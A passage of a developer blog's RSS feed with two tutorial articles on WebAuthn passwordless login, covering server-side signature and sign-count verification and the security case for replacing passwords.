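    rpIdHash,                          // compare against SHA-256 of your rpId
    userPresent: flagBits[7] === "1",  // flag bit 0 (UP)
    userVerified: flagBits[5] === "1", // flag bit 2 (UV)
    signCount: buf.readUInt32BE(33),
  };
}
```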

&lt;p&gt;In the last two steps, we get to the core of verifying: Does the credential match our records? To do so, we first compute a SHA-256 hash of the clientDataJSON. Then we build a joint byte array of the raw authenticator data and that hash, and verify the signature that the client has sent us over this byte array, using the public key in our records. If the verification succeeds, the signature was created over exactly this data by the matching private key. If not, our public key doesn't match the private key of the authenticator, and we should therefore deny the request.&lt;/p&gt;

&lt;p&gt;In a last step, we look at the &lt;code&gt;signCount&lt;/code&gt; of the request. This attribute indicates how often the key has already been used to log in. We initialized the signCount with a value of 0 at signup time. If the provided signCount is not greater than the value we stored (and both are non-zero), the credential may have been cloned, and we should also deny the request; otherwise we store the new value for the next login.&lt;/p&gt;

&lt;h2&gt;
  
  
  We did it!
&lt;/h2&gt;

&lt;p&gt;And that's it! We now have a secure and intuitive method for our users to access their most private data. And the best thing: It even works completely offline!&lt;br&gt;
If you want to see an implementation of this protocol, you can check out &lt;a href="https://github.com/Urmade/WebAuthn-TypeScript"&gt;this GitHub repository&lt;/a&gt;.&lt;br&gt;
And if you want to dig even deeper into how to build WebAuthn, stay tuned! I will publish an article walking through developing a WebAuthn server step by step soon.&lt;/p&gt;

</description>
      <category>tutorial</category>
      <category>security</category>
      <category>webdev</category>
      <category>identity</category>
    </item>
    <item>
      <title>Building towards a web without passwords</title>
      <dc:creator>Tobias Urban</dc:creator>
      <pubDate>Sun, 06 Oct 2019 17:54:30 +0000</pubDate>
      <link>https://forem.com/urmade/building-towards-a-web-without-passwords-lc1</link>
      <guid>https://forem.com/urmade/building-towards-a-web-without-passwords-lc1</guid>
      <description>&lt;h1&gt;
  
  
  Think of all the online accounts that you have...
&lt;/h1&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fthepracticaldev.s3.amazonaws.com%2Fi%2Fe0qyxdmo279urxlocnzo.jpg" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fthepracticaldev.s3.amazonaws.com%2Fi%2Fe0qyxdmo279urxlocnzo.jpg" alt="A tropical jungle"&gt;&lt;/a&gt;&lt;br&gt;
&lt;em&gt;Basically all your online passwords in one picture&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;With nearly every one of these comes a (new) password. And for most people out there, those passwords are in the end all the same. As soon as one app gets hacked, all of their online presences lie open.&lt;/p&gt;

&lt;p&gt;In recent years, a few approaches have come up to tackle that problem. Apps with large userbases like Facebook, Microsoft or Google offer social logins that link your account directly with your social media account (therefore making them your primary Identity Provider), sparing you one more password to remember. But you are still relying on that social media account staying secure, and you are giving out a lot of data to that Identity Provider (whether that is a good thing is up to your judgement).&lt;/p&gt;

&lt;p&gt;Another approach is password managers. With just one (hopefully more secure) password you can access randomly generated passwords for all your accounts, making each secret unique and therefore independent from your other accounts. But again you are relying on a single source of truth, and if your master password is stolen, all of your accounts are breached. You could of course add additional layers of security with Multi-Factor Authentication, but these often require additional hardware and can be costly for the app creator to implement (e.g. when you have to pay SMS fees).&lt;/p&gt;

&lt;h2&gt;
  
  
  Introducing: WebAuthentication
&lt;/h2&gt;

&lt;p&gt;The major OS providers Microsoft, Google and Apple tackled this problem a few years ago when they introduced password-less authentication on their systems. Nowadays it is a de-facto standard for new devices to have some sort of fingerprint or face recognition that lets you access your device without remembering any passwords. And the best feature: Usually your biometric data is stored directly on the device, making it impossible to breach some central database of face or finger data.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fthepracticaldev.s3.amazonaws.com%2Fi%2Fmozknab9dmvbg892n8pw.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fthepracticaldev.s3.amazonaws.com%2Fi%2Fmozknab9dmvbg892n8pw.png" alt="Windows Hello Facial recognition sign-in screen"&gt;&lt;/a&gt;&lt;br&gt;
&lt;em&gt;With biometrics you are the password&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Now that this technology has matured and become the go-to choice for most users in their everyday life, the question arose: How do we get that into the web? And indeed, the W3C tackled exactly this question with their &lt;a href="https://w3c.github.io/webauthn/" rel="noopener noreferrer"&gt;WebAuthn specification&lt;/a&gt;. The specification is currently only a draft, but most of the major players have already adopted the proposed standards, and it is already usable on Windows, Android, iPhone (to some extent) and macOS.&lt;/p&gt;

&lt;p&gt;The basic idea is quite simple: Instead of asking for a password, the browser uses native login methods (e.g. Windows Hello, Touch ID) to verify the user. The application then gets a package of signed information that it can use to verify that it was actually the user who tried to log in (and not some attacker). After successful registration, a private key is stored on the user's device, never exposed in any way. The server gets the corresponding public key and a credential ID that it can store instead of a password.&lt;/p&gt;

&lt;p&gt;If you are interested in the experience from the perspective of an user, check out &lt;a href="https://webauthndemotu2.azurewebsites.net" rel="noopener noreferrer"&gt;this demo&lt;/a&gt;.&lt;/p&gt;

&lt;h2&gt;
  
  
  How is this more secure?
&lt;/h2&gt;

&lt;p&gt;Every user who logs into an app is protected by multiple layers: First, the app has to find the user in its system. The app should have stored the credential ID next to the user ID. The credential ID is useful only for the browser in which the user signed in. If the browser recognizes the credential ID, it will then prompt the user for authentication. If the user passes the authentication (e.g. by providing a security key USB stick or by using Windows Hello / Touch ID), the browser can send some verifiable data to the app. This data will then be verified by the server with the public key it got at sign-up time. If this process succeeds, then the login is successful.&lt;br&gt;
&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fthepracticaldev.s3.amazonaws.com%2Fi%2Fskmzj0wlq3rc3bhizmvr.jpg" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fthepracticaldev.s3.amazonaws.com%2Fi%2Fskmzj0wlq3rc3bhizmvr.jpg" alt="A game of poker"&gt;&lt;/a&gt;&lt;br&gt;
&lt;em&gt;A good representation of how little WebAuthn trusts your login attempt&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;From an app standpoint, WebAuthn offers another awesome benefit: You don't have to store any passwords. All you get from a user is a public key and a credential ID. Both only work if the user is on their device, on your page URL. So let's assume your servers get breached and all credentials are stolen. In the classic password world, this means a major security risk for everyone who ever signed up for your app. With WebAuthn, your users can just move on, and as long as their device and face/finger/security key don't get stolen, their access to your app is still safe. And all other applications where they use WebAuthn to log in are not impacted at all.&lt;/p&gt;

&lt;h2&gt;
  
  
  So can I just use this everywhere now?
&lt;/h2&gt;

&lt;p&gt;WebAuthentication is an exciting protocol that offers a new level of security to users who want to take an extra step in protecting their online data. But by design, this extra step comes with a few inconveniences. By nature, all credentials are stored on the client's device, more specifically in the app or browser that your user used to log into your services. That means that as soon as a user switches to a new device, or to a new browser on their current device, they have to sign up again with new login credentials for your service.&lt;/p&gt;

&lt;p&gt;For scenarios like this you will always depend on other, more universal authentication methods. Let's say a user loses their device, so there is no way to log in with the credentials that you have currently stored. In moments like this, you should always be able to fall back to e.g. email verification or a standard password.&lt;/p&gt;

&lt;p&gt;Generally speaking, although WebAuthn looks promising in enabling a new layer of security, it is just a tool. It is always your responsibility as the app provider to ensure a secure environment for your users, and WebAuthn should be one of many locks that you put in front of your users' data.&lt;/p&gt;

&lt;h2&gt;
  
  
  Enough Intro talk, where can I learn more?
&lt;/h2&gt;

&lt;p&gt;This article is just the kick-off to a series of technical posts about WebAuthn that I plan to launch. You can find the articles here:&lt;br&gt;
&lt;a href="https://dev.to/urmade/getting-started-with-webauthn-the-basic-flow-45jd"&gt;Getting started with WebAuthn: The basic flow&lt;/a&gt;&lt;br&gt;
Securing your WebAuthn server: Response validation (Coming soon)&lt;br&gt;
WebAuthn Step by Step: A specification rundown in code (Coming soon)&lt;/p&gt;

&lt;p&gt;I have also prepared the code for the demo as a learning implementation &lt;a href="https://github.com/Urmade/WebAuthn-TypeScript" rel="noopener noreferrer"&gt;on my GitHub&lt;/a&gt;. I tried to keep the documentation as extensive as possible, so you can just read through the source code and learn more about implementing this protocol. On the GitHub page you can also find a list of resources by others who have written great guides on getting started with WebAuthn. And make sure to check out &lt;a href="https://w3c.github.io/webauthn/" rel="noopener noreferrer"&gt;the official documentation&lt;/a&gt; as well!&lt;/p&gt;

</description>
      <category>security</category>
      <category>webauthentication</category>
      <category>javascript</category>
      <category>webdev</category>
    </item>
  </channel>
</rss>
